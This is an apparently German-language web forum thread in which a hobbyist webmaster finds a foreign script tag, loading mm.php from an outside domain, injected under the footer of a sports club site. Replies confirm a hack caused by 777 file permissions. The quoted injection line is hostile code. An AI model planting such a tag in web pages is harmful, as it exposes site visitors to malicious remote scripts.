+ Antworten
Ergebnis 1 bis 7 von 7

Thema: Wurde ich gehackt? Komischer Code im Quelltext.

  1. #1
    Neu an Board
    Registriert seit
    04.08.2006
    Alter
    42
    Beiträge
    8
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Ausrufezeichen Wurde ich gehackt? Komischer Code im Quelltext.

    Moin,

    ich bin dabei eine neue Seite für meinen Sportverein zu basteln.

    Alte Seite: URL entfernt

    Neue Seite: URL entfernt

    Gestern fiel mir zum ersten Mal auf das im Firefox das Add-On NoScript gemeldet hat, dass beim Aufruf von der alten und auch neuen Seite die Adresse: acrossuniverseitbeorg.com mit aufgerufen wird.

    Ich bin nun leider nicht wirklich bewandert was hacking und Co. angeht. Bis dato hatte ich mit keinen Seiten Probleme dich ich erstellt habe (z.B. für einen Kindergarten od. einen Föderverein).

    Im Quelltext der Seite taucht unter dem Footer folgendes auf:

    alte Seite:
    PHP-Code:
    </div>
    <
    script src="http://acrossuniverseitbeorg.com/mm.php"></script>
    </body>
    </html><!-- 1296741903 --> 
    bzw. neue Seite:

    PHP-Code:
    </div>

    <
    script src="http://acrossuniverseitbeorg.com/mm.php"></script>
    </body> 
    </html> 
    Hat dazu jemand eine Idee ? Von der neuen Seite hab ich leider noch kein Backup, wollte ich eigentlich erst machen wenn ich fertig bin. Beim nächsten Mal bin ich wohl schlauer.

    Danke für eure Hilfe
    Geändert von Orpheus2510 (03.02.2011 um 14:43 Uhr) Grund: Keine Links auf gehackte Seiten posten!

  2. #2
    Gute Seele des Boards Avatar von Orpheus2510
    Registriert seit
    17.10.2006
    Beiträge
    20.807
    Bedankte sich
    287
    Erhielt 4.976 Danksagungen
    in 4.514 Beiträgen

    Standard

    Eindeutig gehackt! Scheinst die Rechte für Dateien und Ordner zu lasch eingestellt zu haben.

  3. #3
    Neu an Board
    Registriert seit
    04.08.2006
    Alter
    42
    Beiträge
    8
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Zitat Zitat von Orpheus2510 Beitrag anzeigen
    Eindeutig gehackt! Scheinst die Rechte für Dateien und Ordner zu lasch eingestellt zu haben.
    die Befürchtung habe ich auch. Die Rechte sind per FTP auf 777 von unserem ersten Vorsitzenden geändert worden, warum auch immer. Ich habe zwar einen Teil bereits zurückgestellt, aber nun ist das wohl zu spät und ich muss den ganzen Kram neu machen.

  4. #4
    Verbringt hier viel Zeit
    Registriert seit
    07.10.2010
    Beiträge
    776
    Bedankte sich
    25
    Erhielt 165 Danksagungen
    in 154 Beiträgen

    Standard

    Ich schließ mich mich Orpheus an.

    Da ruft Flotte wohl

  5. #5
    Gehört zum Inventar
    Registriert seit
    16.08.2006
    Beiträge
    8.516
    Bedankte sich
    1.429
    Erhielt 2.078 Danksagungen
    in 1.905 Beiträgen

    Standard

    und der Ausruf "FAQ" wird doppeldeutig.

  6. #6
    Gute Seele des Boards Avatar von Orpheus2510
    Registriert seit
    17.10.2006
    Beiträge
    20.807
    Bedankte sich
    287
    Erhielt 4.976 Danksagungen
    in 4.514 Beiträgen

    Standard

    Zitat Zitat von urmel23 Beitrag anzeigen
    Die Rechte sind per FTP auf 777 von unserem ersten Vorsitzenden geändert worden, warum auch immer.
    Man läßt auch keine Leute an die entscheidenden Hebel, die nicht wissen, was sie tun.
    Dir bleibt ein kompletter Neuanfang nicht erspart. Und für das nächste Mal weißt du es jetzt hoffentlich besser.

  7. #7
    Wohnt hier Avatar von cylance
    Registriert seit
    10.11.2010
    Beiträge
    2.313
    Bedankte sich
    188
    Erhielt 594 Danksagungen
    in 563 Beiträgen

    Standard

    Zitat Zitat von urmel23 Beitrag anzeigen
    die Befürchtung habe ich auch. Die Rechte sind per FTP auf 777 von unserem ersten Vorsitzenden geändert worden, warum auch immer. Ich habe zwar einen Teil bereits zurückgestellt, aber nun ist das wohl zu spät und ich muss den ganzen Kram neu machen.
    Immerhin hast Du erkannt was zu tun ist.
    Ansonsten kann ich mich Orpheus nur anschliessen.

    Ich schenk Dir noch einen Link
    http://www.joomlaportal.de/beta-howt...-anf-nger.html


    und der Ausruf "FAQ" wird doppeldeutig.
    JC-ROFL.gif

    Der ist gut
    Meine Kristallkugel hat einen Sprung und die Tarotkarten hat's vom Tisch geweht. Detailierte Informationen sind hilfreich.
    We offer three kinds of service: good - chea p - fast. u can pick 2 of them
    FAQ vorn im Forum gelesen?

+ Antworten

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein